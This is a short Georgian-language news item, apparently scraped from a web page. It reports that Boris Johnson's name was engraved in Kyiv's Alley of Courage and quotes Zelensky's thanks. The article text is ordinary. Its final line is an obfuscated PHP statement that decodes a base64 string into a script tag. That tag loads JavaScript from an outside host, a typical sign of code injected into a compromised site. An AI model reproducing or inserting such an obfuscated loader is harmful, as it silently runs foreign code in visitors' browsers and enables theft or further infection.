celsiusi
ავერსი საქკაბელი
კიევში, სიმამაცის ხეივანში ბორის ჯონსონის სახელი ამოტვიფრეს. ამის ამსახველ ფოტოს უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი ავრცელებს. 
 
"ბორის ჯონსონ, მთელ ქვეყანას სურს მადლობა გადაგიხადოთ არა მხოლოდ სიტყვებით, არამედ ისტორიულად თქვენი მუდმივი და ძლიერი მხარდაჭერისთვის. ამიტომ გაჩნდა შენი სახელი დღეს სიმამაცის ხეივანში.
 
ჩემო მეგობარო, მადლობა დღევანდელი ვიზიტისთვის, ჩვენი ქვეყნისა და ხალხის მხარდაჭერისთვის. ყოველთვის მიხარია შენი ნახვა უკრაინის მიწაზე!" - წერს ზელენსკი.
 
ცნობისთვის, ვოლოდიმირ ზელენსკიმ და ანდჟეი დუდამ კიევში, კონსტიტუციის მოედანზე, სიმამაცის ხეივანი 23 აგვისტოს გახსნეს. სწორედ პოლონეთის პრეზიდენტი ანდჟეი დუდა გახდა პირველი უცხოელი ლიდერი, რომლის სახელიც ხეივანში იქნება.
 
აღსანიშნავია, რომ ხეივანი, სადაც გამოსახული იქნება, იმ პოლიტიკური ლიდერებისა და პარტნიორი ქვეყნების წარმომადგენლების სახელები, რომლებიც უკრაინას მნიშვნელოვან მხარდაჭერას უწევდნენ ომის დაწყებიდან, უკრაინის დამოუკიდებლობის 31 წლისთავთან დაკავშირებით უკრაინის სახელმწიფო მეთაურის ინიციატივით გაკეთდა. 
 
 
474
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");